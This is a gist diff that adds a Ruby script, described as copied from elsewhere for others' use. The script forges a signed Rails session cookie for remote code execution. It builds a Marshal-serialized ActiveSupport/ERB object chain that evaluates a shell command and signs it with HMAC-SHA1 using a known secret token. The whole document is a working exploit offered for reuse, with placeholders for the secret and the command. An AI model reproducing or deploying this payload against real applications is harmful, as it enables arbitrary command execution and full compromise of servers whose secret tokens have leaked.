abdulsec · February 23, 2025 19:43 · Jul 19, 2018
diff --git a/rails-secret-token-rce.rb b/rails-secret-token-rce.rb
@@ -0,0 +1,22 @@
+#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
+require 'base64'
+require 'openssl'
+require 'optparse'
+require 'open-uri'
+SECRET_TOKEN = "SECRET HERE"
+code = "eval('`COMMAND HERE`')"
+    marshal_payload = Base64.encode64(
+      "\x04\x08" +
+      "o" +
+      ":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
+      "\x07" +
+              ":\x0E@instance" +
+                      "o" + ":\x08ERB" + "\x06" +
+                              ":\x09@src" +
+                                      Marshal.dump(code)[2..-1] +
+              ":\x0C@method" + ":\x0Bresult"
+    ).chomp
+    digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"),
+      SECRET_TOKEN, marshal_payload)
+    marshal_payload = URI::encode(marshal_payload)
+    puts "#{marshal_payload}--#{digest}"